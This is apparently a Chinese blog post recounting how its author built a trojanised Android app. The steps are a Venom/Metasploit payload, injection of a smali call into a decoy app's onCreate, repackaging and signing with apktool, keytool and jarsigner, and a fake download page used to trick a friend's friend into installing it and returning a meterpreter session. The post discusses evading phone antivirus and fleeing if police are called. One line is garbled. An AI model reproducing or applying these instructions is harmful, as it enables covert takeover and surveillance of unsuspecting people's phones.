伪造安卓木马通过外网渗透内网

原本打算休息几天的(有个大项目)结果一老友给我发来了这条信息

看在相处几个月的份上,不好拒绝啊

我第一时间想到的是使用msfvenom构造payload,但一想到这玩意已经那么出众了,payload估计已经被各大厂商给发现了,然后

推荐个框架Venom-shellcode

项目地址:https://github.com/r00t-3xp10it/venom.git

思路:

制作shellcode ->
打包到apk文件里边 ->
然后进行包注射 ->
最后测试 -> if 测试失败 (重来/放弃) else ->
发送给好友 ->
叫好友发送给好友 -> if 不敢点开 (跑路) else ->
好友的好友点开返回session ->
getshell -> if 好友的好友报警 (跑路) else ->
删除云服务器数据 -< THE END
(emm感觉戏有点多)

获取Payload:

运行venom,选择Android/IOS

选择1,然后设置Hosts,Port,这里略

(需要说明的是,要是你做了内网穿透,那么Host跟Port直接绑定你的外网ip即可)

(反正到时候看shell弹到哪里)

最后生成的payload文件

嫌麻烦的话可以使用backdoor_apk进行操作

一般情况下直接安装,手机自带的安全管家会出现拦截

这里的话网上所有安卓免杀实例都失效了

再用下去也是死办法

还有什么方法能取得对方对这个软件的信任呢

为此我专门写了个软件来合并我们的payload

这软件也没啥功能,就几个控件随便摆摆随便写写

需要用到的工具:

  • ketrool
  • jarsigner(Kali 2019.04 版本没有)
  • apktool

首先使用apktool [ d ] 参数对payload (mother.apk) 及欺骗app (com.number....apk) 进行反编译

打开目录里边第一个文件 [Androidxxx] 里边包含系统权限及软件基本信息

需要说明的是系统权限非常重要,我写的这个软件基本上所有权限都给了

查找程序的

方框内com.iapp.app.....相当于文件夹com/iapp/app

切换到这个文件夹,搜索logoActivity.smxxx(不同程序这个是不一样的)

接着打开文件,搜索 [ onCreate(Landroid/os/Bundle;)V ] 然后在下边加入这条语句

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

接着把刚才反编译的payload工程下的

/smail/metasploit复制到当前com/下

接着 [b] 参数编译文件夹,最终生成的apk保存在 工程/dict 文件下

到这儿我们的安装包是没有签名的,不管你怎么使都莈冇≧〩ζα鼡げΓě啲┮オ┡

keytool生成安卓签名密钥

keytool -genkey -v -keystore name.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity xxxxx

 

使用jarsigner工具进行写入(Kali 201904版本没有这个)

jarsigner -keystore name.keystore appname.apk alias_name -sigalg MDSwithRSA -digestalg SHA1

最终效果图(换了个图标)

在开始之前建议有条件的做个内网穿透,没条件的上vultr买个vps

这里我也就不多说画张拓扑图自行体会

怎样端口映射我就不多说了,前面说过要获取一个人的信任是非常难的,为此我花了几分钟下了个网页模板稍微改了一下

Before

After

点首页还能切换模板

一切都准备就绪,接下来就

等了半个小时,屏幕上始终没有动静

(我原本还在想那么简陋的网页怎么可能有人回信)

结果

卧槽他还真下载了,屏幕上一行行的sessions返回最后回显一个meterpreter我就知道我离xx不远了

接下来就是日常meterpreter操作,没啥可看的

好了就这样(请从正规渠道下载APP)

最后我的朋友跟他的朋友解释了表示这只是一个玩笑 :D

参考文献:

https://blog.csdn.net/qq_22596931/article/details/91046523

https://www.freebuf.com/sectool/141234.html

https://www.freebuf.com/articles/terminal/133357.html

THE END

 

 

点赞
  1. 你爸说道:
    Microsoft Edge Windows 10

    真的牛批

  2. dakaer说道:
    Firefox Ubuntu

    学习了

发表评论

电子邮件地址不会被公开,只有你知道( ̄▽ ̄)"